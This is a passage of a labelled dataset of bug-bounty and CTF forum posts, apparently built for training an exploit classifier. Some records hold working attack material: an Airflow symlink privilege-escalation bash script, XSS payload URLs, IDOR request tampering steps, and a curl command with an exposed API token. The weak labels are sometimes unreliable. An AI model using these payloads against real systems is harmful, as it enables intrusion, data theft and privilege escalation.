Version 1.12.114 Chromium: 84.0.4147.135 (Windows)\n\n## Steps To Reproduce:\n\n * Visit the POC link https://php-demo-app-shibli.cfapps.io/brave/poc-bave.php?x=.torrent\n* Click on \"Start Torrent\"\n* Once the file starts downloading, try opening up the file\n* You will see the previous tab will navigate to a different torrent file or website.\n\nPlease refer below video poc for better understanding.\n\n{F965473}\n\n## Impact\n\n* An attacker can trick a victim to download a malicious file instead of the original file.\n* An attacker can redirect a user to a malicious webpage for other harmful attacks.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-06-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "fc3e1a790c3f0f3efb4b", "text": "[Cross-site Scripting (XSS) - Stored] stored cross site scripting in https://█████████\n\nIt was observed that the application is vulnerable to cross-site scripting (XSS). XSS is a type of attack that involves running a malicious scripts on a victim’s browser.\npoc attached\nanother parameter at #1636345\nq_21677\n\n## Impact\n\nCookie Stealing - A malicious user can steal cookies and use them to gain access to the application.\nArbitrary requests - An attacker can use XSS to send requests that appear to be from the victim to the web server.\nMalware download - XSS can prompt the user to download malware. Since the prompt looks like a legitimate request from the\nsite, the user may be more likely to trust the request and actually install the malware.\nDefacement - attacker can deface the website usig javascript code.\n\n## System Host(s)\n███████\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\nvideo attached\n\n## Suggested Mitigation/Remediation Actions", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-01-06", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7191aa342cf789de9f40", "text": "I didn’t find a correct solution, but read the flag using the ‘-b’ switch for a server script that uses ‘mv’. Hack the planet haha Ok.Got it. little hint, not directly solution: ‘((ob))’, yes, I know, but it’s not you think it is. Change something and fill in between the brackets and be sure to use money for it.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-01-26", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "270b338b60894f57afb0", "text": "[Insecure Direct Object Reference (IDOR)] IDOR able to buy a plan with lesser fee\n\n## Summary\nIDOR allows you to pay with the same amount but different currency. For example, paying 35000$ instead of 35000€\n\n## Steps To Reproduce\n1. Go to `https://account.mailpoet.com/` and select a plan\n2. For example I have selected this plan; `https://account.mailpoet.com/orders/new?p=214`\n3. Now, as you can see payment currency is euro (33600€)\n\n{F1882065}\n\n4. Add `cur` parameter as `usd` like `{F1882070}https://account.mailpoet.com/orders/new?p=214&cur=usd`\n5. And now, we can buy it as 33600$ instead of 33600€\n\n{F1882070}\n\n##Suggested solutions\nAdd an Dollar/Euro converter to your payment system\n\nCheers,\n@h1ugroon\n\n## Impact\n\nAny user can pay a fee with a different value but the same root number instead of euros. For example, for a €33600 transaction, the fee difference is about $107, but the reason for this is the recent increase in the dollar. The user's profit rate varies according to the value of the money. About 1 month ago, this profit rate is around 630 dollars. Although this is not a critical problem, it is a vulnerability that reduces the profit margin", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-10-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9d2a57e55f1206be9463", "text": "Text me If you want! I will support you! my discord satellite#1213", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-02-21", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e2bf3342b4209b2de45b", "text": "Hiding text, symbols, numbers in hand written drawing with help from program?\n\nI did a lot of research before posting on here so I apologize upfront if its a little newbish. That said I have a jpeg image that is hand drawn that is a map for a contest. After looking at the map I noticed some simple stuff hidden within that could just be picked out with my eyes. I wondered though if there was more and after using image processing features on dcode I have realized there is multiple layers of info that comes out depending on what I use on there like CMYK Channels, CPBit map image, EXIF Data, and on and on. I also was able to get some stuff to show using some features inside adobe photoshop.My question is it seems this is way above just drawling something and hiding a few things in the drawling with basic steganography skills. Its like the drawling looks hand drawn but it would almost have to be programmed or created with some type of software. Because I have found areas that have multiple things show in same area of the jpeg depending on what filter or whatever I have ran. So its layered I guess is the best way to put it.For anyone that can help I would be willing to share what I win for the contest if we can figure it out. Thanks for any guidance on the subject. I didn't want to post pics until I knew it would be ok to do so. Legacy", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hacker_exploits", "forum_id": "antionline", "timestamp": "2022-01-03", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "49c9b18f5fa6ad908330", "text": "[Insecure Storage of Sensitive Information] Leaking sensitive information through JSON file path.\n\nHello team,\n \nI have found one JSON path at \"https://lookup.nextcloud.com/\" which is leaking some information like Username, email id, version, etc.. \nI guess it show the user who have installed or configure anything through the vendor. I was also able to download some of the zip files of the vendor and much more.\n\n--> Steps To Reproduce:\n 1) Go to this link \"https://lookup.nextcloud.com/vendor/composer/installed.json\" \n 2) See the raw data, you will get leakage of some important data.\n\n[\n {\n \"name\": \"psr/http-message\",\n \"version\": \"1.0.1\",\n \"version_normalized\": \"1.0.1.0\",\n \"source\": {\n \"type\": \"git\",\n \"url\": \"https://github.com/php-fig/http-message.git\",\n \"reference\": \"f6561bf28d520154e4b0ec72be95418abe6d9363\"\n },\n \"dist\": {\n \"type\": \"zip\",\n \"url\": \"https://api.github.com/repos/php-fig/http-message/zipball/f6561bf28d520154e4b0ec72be95418abe6d9363\",\n \"reference\": \"f6561bf28d520154e4b0ec72be95418abe6d9363\",\n \"shasum\": \"\"\n },\n \"require\": {\n \"php\": \">=5.3.0\"\n },\n \"time\": \"2016-08-06T14:39:51+00:00\",\n \"type\": \"library\",\n \"extra\": {\n \"branch-alias\": {\n \"dev-master\": \"1.0.x-dev\"\n }\n },\n \"installation-source\": \"dist\",\n \"autoload\": {\n \"psr-4\": {\n \"Psr\\\\Http\\\\Message\\\\\": \"src/\"\n }\n },\n \"notification-url\": \"https://packagist.org/downloads/\",\n \"license\": [\n \"MIT\"\n ],\n \"authors\": [\n {\n \"name\": \"PHP-FIG\",\n \"homepage\": \"http://www.php-fig.org/\"\n }\n ],\n \"description\": \"Common interface for HTTP messages\",\n \"homepage\": \"https://github.com/php-fig/http-message\",\n \"keywords\": [\n \"http\",\n \"http-message\",\n \"psr\",\n \"psr-7\",\n \"request\",\n \"response\"\n ]\n },\n {\n \"name\": \"pimple/pimple\",\n \"version\": \"v3.0.2\",\n \"version_normalized\": \"3.0.2.0\",\n \"source\": {\n \"type\": \"git\",\n \"url\": \"https://github.com/silexphp/Pimple.git\",\n \"reference\": \"a30f7d6e57565a2e1a316e1baf2a483f788b258a\"\n },\n \"dist\": {\n \"type\": \"zip\",\n \"url\": \"https://api.github.com/repos/silexphp/Pimple/zipball/a30f7d6e57565a2e1a316e1baf2a483f788b258a\",\n \"reference\": \"a30f7d6e57565a2e1a316e1baf2a483f788b258a\",\n \"shasum\": \"\"\n },\n \"require\": {\n \"php\": \">=5.3.0\"\n },\n \"time\": \"2015-09-11T15:10:35+00:00\",\n \"type\": \"library\",\n \"extra\": {\n \"branch-alias\": {\n \"dev-master\": \"3.0.x-dev\"\n }\n },\n \"installation-source\": \"dist\",\n \"autoload\": {\n \"psr-0\": {\n \"Pimple\": \"src/\"\n }\n },\n \"notification-url\": \"https://packagist.org/downloads/\",\n \"license\": [\n \"MIT\"\n ],\n \"authors\": [\n {\n \"name\": \"Fabien Potencier\",\n \"email\": \"fabien@symfony.com\"\n }\n ],\n \"description\": \"Pimple, a simple Dependency Injection Container\",\n \"homepage\": \"http://pimple.sensiolabs.org\",\n \"keywords\": [\n \"container\",\n \"dependency injection\"\n ]\n },\n {\n \"name\": \"psr/container\",\n \"version\": \"1.0.0\",\n \"version_normalized\": \"1.0.0.0\",\n \"source\": {\n \"type\": \"git\",\n \"url\": \"https://github.com/php-fig/container.git\",\n \"reference\": \"b7ce3b176482dbbc1245ebf52b181af44c2cf55f\"\n },\n \"dist\": {\n \"type\": \"zip\",\n \"url\": \"https://api.github.com/repos/php-fig/container/zipball/b7ce3b176482dbbc1245ebf52b181af44c2cf55f\",\n \"reference\": ", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-02-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "dcd8e0ac8e790dc76ee5", "text": "[Cross-site Scripting (XSS) - Generic] Incomplete fix for CVE-2022-32209 (XSS in Rails::Html::Sanitizer under certain configurations)\n\nWhile building a PoC for CVE-2022-32209, I noticed that I could not fix my vulnerable application by updating https://github.com/rails/rails-html-sanitizer from 1.4.2 to 1.4.3 even though the Hackerone report about this vulnerability suggested that this should fix it (see here: https://hackerone.com/reports/1530898).\n\nI built this app with Rails 7.0.3.1 by just running \"rails new\", adding `config.action_view.sanitized_allowed_tags = [\"select\", \"style\"]` to the file `config/application.rb` and creating an endpoint that reflected a parameter after sanitizing it (ERB: `

Hello <%= sanitize @name %>

`). When using the payload `` for the parameter I got an alert no matter what the version of rails-html-sanitizer was.\n\nI believe the reason is the following. There are two ways you can pass the list of allowed tags to the sanitizer. One is via a list of tags stored in a class attribute, the other is via an argument passed into the `sanitize` method. The fix only considered the second way but the first one was forgotten. See the commit with the fix here: https://github.com/rails/rails-html-sanitizer/commit/c871aa4034d3d80ad67cf33a3462154b0a0fb477#diff-0daf33b9062eb5ccdeae86ed8bf2662a6e8669f1a7db590802b7f3b36ea47426R159\nThe relevant part of the code is this:\n\n```ruby\nmodule Rails\n module Html\n class SafeListSanitizer < Sanitizer\n ...\n def remove_safelist_tag_combinations(tags)\n if !loofah_using_html5? && tags.include?(\"select\") && tags.include?(\"style\")\n warn(\"WARNING: #{self.class}: removing 'style' from safelist, should not be combined with 'select'\")\n tags.delete(\"style\")\n end\n tags\n end\n\n def allowed_tags(options)\n if options[:tags]\n remove_safelist_tag_combinations(options[:tags])\n else\n self.class.allowed_tags\n end\n end\n ...\n end\n end\nend\n```\n\nMethod `remove_safelist_tag_combinations` is introduced to remove `style` from the allow list if `select` is in there. However, within method `allowed_tags` this cleanup is only applied to the tag list in the `options`, not to ` self.class.allowed_tags`, the list stored in the sanitizer class.\nHowever, it seems that the configuration in `config/application.rb` which I've set above put the list into the class variable (I've sprinkled a few `puts` here and there to confirm that).\n\nMoreover, when moving the allow list from `config/application.rb` into the ERB template\n(`

Hello <%= sanitize @name, tags: [\"select\", \"style\"] %>

`), the update from\n1.4.2 to 1.4.3 does fix the problem.\n\nThe following patch to https://github.com/rails/rails-html-sanitizer should complete the fix for CVE-2022-32209 (also added a test, which is mostly copy&paste from the test method `test_disallow_the_dangerous_safelist_combination_of_select_and_style` found in the commit linked above):\n\n```\nFrom fb9882599684f5796805107ec98f6a18bba722ec Mon Sep 17 00:00:00 2001\nFrom: Dominic Breuker \nDate: Fri, 29 Jul 2022 23:08:57 +0200\nSubject: [PATCH] disallow select and style in safelist also when specified in\n sanitizer class allowed_tags list\n\n---\n lib/rails/html/sanitizer.rb | 6 +-----\n test/sanitizer_test.rb | 20 ++++++++++++++++++++\n 2 files changed, 21 insertions(+), 5 deletions(-)\n\ndiff --git a/lib/rails/html/sanitizer.rb b/lib/rails/html/sanitizer.rb\nindex 97503c8..4a0d43f 100644\n--- a/lib/rails/html/sanitizer.rb\n+++ b/lib/rails/html/sanitizer.rb\n@@ -155,11 +155,7 @@ module Rails\n end\n \n def allowed_tags(options)\n- if options[:tags]\n- remove_safelist_tag_combinations(options[:tags])\n- else\n- self.class.allowed_tags\n- end\n+ remove_safelist_tag_combinations(options[:tags] || self.class.allowed_tags)\n end\n \n def allowed_attributes(options)\ndiff --git a/test/sanitizer_test.rb b/test/sanitizer_test.rb", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-32209"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-12-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "39448f1fc3ab6a322656", "text": "[Insecure Direct Object Reference (IDOR)] IDOR: leak buyer info & Publish/Hide foreign comments\n\nHI @judgeme!\nI noticed that the attacker can learn email users who left feedback at the time of buying.\n\nStep to reproduce:\n\n1. Login to our store and install your 'Checkout Comments' addon\n2. Make fake order in or store and write a comment\n\n███\n\n3. Then go to our Shopify `/admin/apps/checkout-comments/extensions/checkout_comments/comments`\n4. Publish our comment and Intercept request with burp. Send request to Repeater. Request example:\n\nPOST /extensions/checkout_comments/curate_comment HTTP/1.1\nHost: judge.me\nCookie: _judgeme_session=████████████████; _ga=GA1.2.1935027813.1637882690; _gid=GA1.2.2043288340.1637882690; _fbp=fb.1.1637882690590.2069272048; _gat_UA-28424713-2=1\nUser-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.7113.93 Safari/537.36\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://judge.me/extensions/checkout_comments/comments?platform=shopify&shop_domain=test-hackerone-glis.myshopify.com&page=3&offset=50\nX-Csrf-Token: ████==\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 23\nOrigin: https://judge.me\nTe: trailers\nConnection: close\n\ncomment_id=1&curated=ok\n\n\n\n5. Edit `comment_id=random_id` and in Response we can see buyer information (for example):\n\n\n`{\"comment\":{\"id\":1,\"content\":\"classic dress watch for weddings\",\"created_at\":\"over 3 years ago\",\"product\":{\"title\":\"Dress Watch\",\"url\":\"https://████.myshopify.com/products/dress-watch\"},\"buyer\":{\"name\":\"F F\",\"email\":\"██████████@gmail.com\"},\"published_status\":true,\"published_status_text\":\"Published\",\"curated\":\"ok\"}}`\n\n\n██████\n\n\n\nVideo POC:\n\n\n\n██████\n\n## Impact\n\nBuyer information leaks and other", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-03-31", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "62fd92bd281e012ef61d", "text": "[Heap Overflow] Read and write beyond bounds in mod_sed\n\nThis CVE consists of several bugs in mod_sed, where overflows, truncation, uses after free and a logic error can allow a remote, unauthenticated attacker to read and/or write heap locations beyond bounds. See https://github.com/apache/httpd/commit/943f57b336f264d77e5b780c82ab73daf3d14deb and https://github.com/apache/httpd/commit/e266bd09c313a668d7cca17a8b096d189148be49 for the commits that fixed the bugs. Attached are my reports to the httpd team; email me if you need additional information.\n\n----\n1. Use-after-free and truncation/overflows causing read/write beyond bounds:\n```\nGreetings. I have discovered a use-after-free bug in sed1.c that causes a read and/or write beyond bounds.\n\nThe bug is that dosub() (modules/filters/sed1.c) does not update |step_vars->loc1| or |step_vars->loc2| after appending to -- and thus possibly causing an expansion and reallocation of -- |genbuf| and/or |linebuf|. If a reallocation of |linebuf| occurs, this omission leaves |step_vars->loc1| and |step_vars->loc2| pointing into the old |linebuf|, causing failures later.\n\nWhen control exits dosub(), then enters again on the next iteration of the loop in substitute() [1], a read and/or write beyond bounds occurs in the first call from dosub() to place(), because place()'s |al1| argument points to the new |linebuf|, while the |al2| argument points to the old |linebuf|. This causes place() to calculate a bogus |n|:\n\n int n = al2 - al1;\n\n[2] and then to read and/or write beyond bounds via:\n\n memcpy(sp, al1, n);\n\nThe invalid access is only an incorrectly-shortened read or a read beyond bounds if |n| does not become negative and if\n\n unsigned int reqsize = (sp - eval->genbuf) + n + 1;\n\ndoes not overflow, because in this case the resulting |genbuf| is large enough to accomodate |n| bytes of data. If, however, |n| is negative or |reqsize| overflows, |reqsize| is too small, and place() doesn't enlarge |genbuf| to accomodate the true |n|, causing the memcpy() to write beyond bounds.\n\nBelow is a POC that demonstrates the issue.\n\nUse the POC thusly:\n\n 1. Build httpd_bug_17h.cpp (below) using Visual Studio, modifying the server IP address (127.0.0.1 in the provided code) to be instead the IP address or DNS name of the test httpd server installation.\n\n 2. Copy postform.htm (below) to /bug17h/postform.htm in the httpd server's ServerRoot folder.\n\n 3. Add the httpd.conf lines (see below) into the httpd server installation's httpd.conf in a section for the ServerRoot folder.\n\n 4. Restart httpd.\n\n 5. Attach a debugger to httpd and set a breakpoint on grow_line_buffer ().\n\n 6. Run httpd_bug_17h, which will send the triggering POST data to httpd.\n\n 7. When the breakpoint fires, check |newsize|. If it is < ~33MB let control continue. When |newsize| reaches 16MB, continuing will cause execution to resume for ~15 minutes (on a relatively-old CPU).\n\n 8. When |newsize| reaches ~33MB, examine and record the values of |eval->linebuf| and |eval->lspend|. Now step over the call to grow_buffer() and notice that it reallocates the line buffer, giving new values for |eval->linebuf| and |eval->lspend|.\n\n 9. Step out of grow_line_buffer(), etc., back into dosub(). Step the last few lines of dosub() and notice how it leaves |step_vars|'s |loc*| members pointing to the old |linebuf|.\n\n 10. Now set a BP on dosub()'s first call to place() and proceed.\n\n 11. When the BP fires, step into place(). Notice that |al2| points into the old |linebuf|, whereas |al1| points into the new |linebuf|. Step through the calculation of |n| and notice how it's bogus (in my tests, it's negative). Notice how |reqsize| also becomes bogus. Step the rest of the function and notice how the memcpy() reads beyond bounds.\n\nNote that the POC uses an expansion factor of 256 (i.e., one \"0\" becomes 256 \"z\" characters. I suspect that more realistic expansion factors will trigger the same bug. I am working on a POC to show that.)\n\nThis bug is still present in trunk. https://svn.apache.org/viewvc/httpd/httpd/trunk/module", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-04-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "68152050db4bf79184ae", "text": "[HTTP Request Smuggling] CVE-2022-32214 - HTTP Request Smuggling Due To Improper Delimiting of Header Fields\n\nOriginal Report: https://hackerone.com/reports/1524692\n\n## Impact\n\nDepending on the specific web application, HRS can lead to cache poisoning, bypassing of security layers, stealing of credentials and so on.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-32214"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-07-22", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "9f5d1c250d1e1b9fc944", "text": "if you run ‘apt list --installed’ first line of output is ‘Listing… Done’ so you need to exclude that line. To get the correct answer command should be ‘apt list --installed | grep “installed” | wc -l’ this will exclude the first line of the output.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2023-03-16", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "2e3ede3df805014a5902", "text": "[Cross-site Scripting (XSS) - Reflected] XSS DUE TO CVE-2022-38463 in https://████████\n\n**Description:**\nDuring my research, I found one of the host running ServiceNow vulnerable to CVE-2022-38463 . ServiceNow through San Diego Patch 4b and Patch 6 allows reflected XSS in the logout functionality.\n\n## Impact\n\nAttacker is able to steal victims cookies, redirect victim to attacker controlled domain, and perform various malicious activities.\n\n## System Host(s)\n███\n\n## Affected Product(s) and Version(s)\n\n\n## CVE Numbers\n\n\n## Steps to Reproduce\n1.Enter the following crafted URL in any web-browser.\n\nhttps://█████████/logout_redirect.do?sysparm_url=//j%5c%5cjavascript%3aalert(document.domain)\n\n2. XSS will be triggered.\n\n## Suggested Mitigation/Remediation Actions", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2022-38463"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-14", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "25827f84e46b47ad6733", "text": "[Cleartext Transmission of Sensitive Information] fetlife.com/signup_step_profile expose access_token of mapbox.com\n\nHi fetlife, I'm investigate on registration step on your site, in registration step at https://fetlife.com/signup_step_profile\n\nwhen user type in field \"private_location_name\"\n\n{F2652527}\n\nit use frontend call to api.mapbox.com directly thus expose `access_token`, I was able to call it directly via command line:\n\n```\ncurl 'https://api.mapbox.com/geocoding/v5/mapbox.places/ho%20chi.json?limit=10&types=place%2Clocality&autocomplete=true&language=en&access_token=pk.eyJ1IjoiZmV0bGlmZSIsImEiOiJjazhwMjNrajUwN2luM2xwcmxmMDNoajFoIn0.vge5GmfaG4OTyth8uS_N6w' \\\n -H 'sec-ch-ua: \"Chromium\";v=\"116\", \"Not)A;Brand\";v=\"24\", \"Google Chrome\";v=\"116\"' \\\n -H 'Referer: https://fetlife.com/' \\\n -H 'sec-ch-ua-mobile: ?0' \\\n -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36' \\\n -H 'sec-ch-ua-platform: \"Linux\"' \\\n --compressed\n```\n\nUpon having this access_token, I could freely use your token on my site, even though fetlife have `Referer: https://fetlife.com/`, I could navigate around that easily using direct http call from my server and inject Referer header as `https://fetlife.com/`.\n\n----------------------------------------------------------------------------------------------------------\n\nAnother issue (not security related), this request is for validating attribute unhandle email case yet :\n\n```\ncurl 'https://fetlife.com/users/attributes/email?email=deepblue29@wearehackerone.com' \\\n -H 'sec-ch-ua: \"Chromium\";v=\"116\", \"Not)A;Brand\";v=\"24\", \"Google Chrome\";v=\"116\"' \\\n -H 'Accept: application/json' \\\n -H 'Referer: https://fetlife.com/signup_step_profile' \\\n -H 'X-CSRF-Token: WbVVfdWFF2nIoWJ7yJHpjVMtt1i1_VFMTpDyq4dRI72NG3onq_MOtQmhHXD6nlD-aKAYoqpvAhCAWu8z6zf_qQ' \\\n -H 'sec-ch-ua-mobile: ?0' \\\n -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36' \\\n -H 'sec-ch-ua-platform: \"Linux\"' \\\n --compressed\n```\n\n```\n500 Internal Server Error\nIf you are the administrator of this website, then please read this web application's log file and/or the web server's log file to find out what went wrong.%\n```\n\n----------------------------------------------------------------------------------------------------------\n\nAnother issue I see there is two `authenticity_token` on registration hidden input, I believe this is a mistake (?) \n\n{F2652528}\n\n## Impact\n\nexposing access_token on mapbox give me freely use of your resources (I use, you pay).", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-01", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "7e664c8315418cbb2dc0", "text": "[Incorrect Permission Assignment for Critical Resource] Airflow Daemon Mode Insecure Umask Privilege Escalation\n\nApache Airflow prior to 2.3.4 had multiple components with an insecure daemon umask of 0, resulting in critical files and directories to be world writable. As such, any local user can infer Airflow to process specially crafted input and ultimately perform a privilege escalation to user executing Airflow. In particular the scheduler component is exploitable.\n\nThis is CWE-277: Insecure Inherited Permissions\n\nThe vulnerability and fix was announced as https://www.openwall.com/lists/oss-security/2022/09/02/3\n\n# Proof of concept\n\nThe following attack works against the demo installation of Apache Airflow (when `airflow scheduler` is run with the `--daemon` flag):\n```\n#!/bin/bash\nTARGET=/home/airflow\numask 0\ncd $TARGET/logs/scheduler/latest/native_dags/example_dags\nrm example_bash_operator.py.log\nln -s $TARGET/dags/poc.py example_bash_operator.py.log\nuntil [ -f $TARGET/dags/poc.py ]\ndo\n sleep 1\ndone\nrm example_bash_operator.py.log\n(cat <<'EOF'\nimport os\nos.system(\"id >>/tmp/pwned\")\nfrom airflow import DAG\nEOF\n) > $TARGET/dags/poc.py\n```\nThe injected DAG payload (code execution) is triggered when the Airflow scheduler is restarted. This simple PoC performs a full arbitrary code execution, but other means of gaining control via custom DAGs exist as well.\n\n## Impact\n\nPrivilege escalation: loss of confidentiality, integrity and availability", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-09-17", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "97c3eac62d690d37c51a", "text": "I finished this module today. It was brutal. It was very confusing, and I thank you all for helping me in one way or another. The comments by @akorexsecurity specifically enabled me to finish this module. John", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackthebox", "forum_id": "hackthebox", "timestamp": "2022-12-07", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "fbdb1aa9bf44807665e4", "text": "[Cross-site Scripting (XSS) - Reflected] XSS via X-Forwarded-Host header\n\nSummary:\nThe https://www.omise.co/ website is vulnerable to a cross-site scripting flaw if the server receives a crafted X-Forwarded-Host header.\n\nDescription:\nThe server reads data directly from the HTTP request and reflects it back in the HTTP response. Reflected XSS exploits occur when an attacker causes a victim to supply dangerous content to a vulnerable web application, which is then reflected back to the victim and executed by the web browser. The most common mechanism for delivering malicious content is to include it as a parameter in a URL that is posted publicly or e-mailed directly to the victim. URLs constructed in this manner constitute the core of many phishing schemes, whereby an attacker convinces a victim to visit a URL that refers to a vulnerable site. After the site reflects the attacker's content back to the victim, the content is executed by the victim's browser.\n\n\nSteps To Reproduce:\nOriginal Link - https://www.omise.co/\n\n 1. Visit https://www.omise.co/ capture the request in Intercept \n 2. Send the request to Repeater add X-Forwarded-Host: bing.com\"> below Host: www.omise.co\n 3. The JavaScript alert box displays some cookie information. \n\nMitigation:\nIgnore invalid browser headers. Filter metacharacters from user input.\n\nPOC:\nAttached Video.\n\n## Impact\n\nThis flaw allows attackers to pass rogue JavaScript to unsuspecting users. The user’s browser has no way to know the script should not be trusted, so it will execute the script and because the browser thinks the script came from a trusted source, aka your website, a malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with your site. These scripts can even rewrite the content of the HTML page.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "407d032f5d19f1ae59b7", "text": "[Unknown] Yet another SSRF query for Javascript\n\nThis bug was reported directly to GitHub Security Lab.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "0059447d640072a0980b", "text": "[Improper Access Control - Generic] CVE-2023-30587 Process-based permissions can be bypassed with the \"inspector\" module.\n\n[https://hackerone.com/reports/1962701](https://hackerone.com/reports/1962701) Restrictions set with the new process based permission flag can by bypassed with the built-in inspector module.\n\n## Impact\n\nPermission Model is a mechanism for restricting access to specific resources during execution. This bypasses those restrictions.", "label": 2, "label_name": "actionable_exploit", "cve_ids": ["CVE-2023-30587"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-09-30", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "31d86039f36159fb669c", "text": "[Cross-site Scripting (XSS) - Reflected] Reflected XSS in https://███████ via hidden parameter \"████████\"\n\nHi everyone :)\n\nI found a Reflected XSS on https://███████ via hidden parameter \"████████\" on the following authentication page : https://███████/██████████\n\n\n## Steps To Reproduce:\n\n- Use your favorite web browser\n- Go to : \n```\nhttps://███████/███████&███=TEST%22%3E%3Cscript%3Ealert(%27Reflected%20XSS%27)%3C/script%3E\n```\n\nAn XSS is triggered !\n\nThe initial page was https://█████████/█████████\n\nWith a little research, you can find a hidden parameter \"████████\" which is directly reflected in the source code **without sanitize user entries**. Then just close the tag and inject our malicious code.\n\n## Supporting Material/References:\nWork on every browser (Firefox, Chrome ..)\n\n## Suggested Mitigation/Remediation Actions\n\n- Never trust user inputs, and therefore sanitize them.\n- If the parameter \"███\" is useless in this page and in the authentication process, then it should be deleted.\n\n## Impact\n\nThe damages of a reflexive XSS flaw are numerous: executing malicious javascript code, phishing, defacing ... We can also inject HTML code and mislead the user when displaying the web page.\n\nFrom [OWASP](https://owasp.org/www-community/attacks/xss/) :\n\n>Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.", "label": 0, "label_name": "non_exploit_noise", "cve_ids": [], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2022-01-19", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "e2397f8b82b2696d1960", "text": "[Improper Authorization] CVE-2023-47037: Airflow Broken Access Control Vulnerability\n\nHi IBB,\nApache Airflow, versions before 2.7.3, is affected by a vulnerability that allows authenticated and DAG-view authorized Users to modify some DAG run detail values when submitting notes. This could have them alter details such as configuration parameters, start date, etc. \n\n\nHere is the conversation between the security team of airflow.\n\n█████\n\nMore Details:\nhttps://lists.apache.org/thread/04y4vrw1t2xl030gswtctc4nt1w90cb0\n\n## Impact\n\nBroken Access Control Vulnerability.", "label": 1, "label_name": "vulnerability_discussion", "cve_ids": ["CVE-2023-47037"], "source": "hackerone", "forum_id": "hackerone", "timestamp": "2023-11-29", "split": "val", "label_source": "weak_cve_metadata_plus_actionability_terms"} -{"id": "407c25dd23a145bc428a", "text": "[Improper Access Control - Generic] fs module's file watching is not restricted by --allow-fs-read\n\n**Summary:** [add summary of the vulnerability]\nThe `--allow-fs-read` flag of the permission system does not prevent file watching.\n\n**Description:** [add more details about this vulnerability]\nAttackers can watch files that they don't have read access to.\n\n## Steps To Reproduce:\nRun the following code with `--experimental-permission` and do not grant read access to `file.txt`. Modify `file.txt` in another process. Information is leaked to the attacker about a file they should not have access to.\n\n```js\n'use strict';\nconst fs = require('node:fs');\n\nasync function main() {\n\tfs.watchFile(__dirname + 